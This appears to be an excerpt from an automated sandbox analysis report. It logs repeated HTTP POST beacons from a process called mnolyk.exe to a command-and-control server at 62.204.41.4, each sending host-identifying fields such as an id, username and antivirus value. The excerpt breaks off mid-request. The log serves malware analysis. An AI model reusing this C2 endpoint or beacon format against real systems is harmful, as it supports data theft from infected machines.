                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:05.898107052 CET623INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          469192.168.2.65019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:06.078732967 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:06.141968012 CET624INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          47192.168.2.64976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:02.341784954 CET160OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:02.408010006 CET160INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          470192.168.2.65019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:06.319605112 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:06.383594036 CET625INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          471192.168.2.65019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:06.562601089 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:06.626566887 CET626INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          472192.168.2.65019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:06.840701103 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:06.904644966 CET627INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          473192.168.2.65019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:07.083062887 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:07.148803949 CET628INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          474192.168.2.65019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:07.326755047 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:07.389992952 CET629INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          475192.168.2.65020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:07.560015917 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:07.623392105 CET630INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          476192.168.2.65020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:07.797560930 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:07.863240004 CET631INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          477192.168.2.65020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:08.029584885 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:08.095988035 CET632INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          478192.168.2.65020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:08.264781952 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:08.329248905 CET633INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          479192.168.2.65020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:08.498528957 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:08.562843084 CET634INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          48192.168.2.64976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:02.575090885 CET161OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:02.641204119 CET161INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          480192.168.2.65020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:08.738599062 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:08.804395914 CET635INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          481192.168.2.65020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:08.986815929 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:09.053705931 CET636INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          482192.168.2.65020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:09.251394033 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:09.317115068 CET637INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          483192.168.2.65020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:09.500906944 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:09.565390110 CET638INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          484192.168.2.65020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:09.736542940 CET639OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:09.801541090 CET639INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          485192.168.2.65021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:09.990258932 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:10.056719065 CET640INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          486192.168.2.65021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:10.237660885 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:10.302833080 CET641INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          487192.168.2.65021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:10.483510971 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
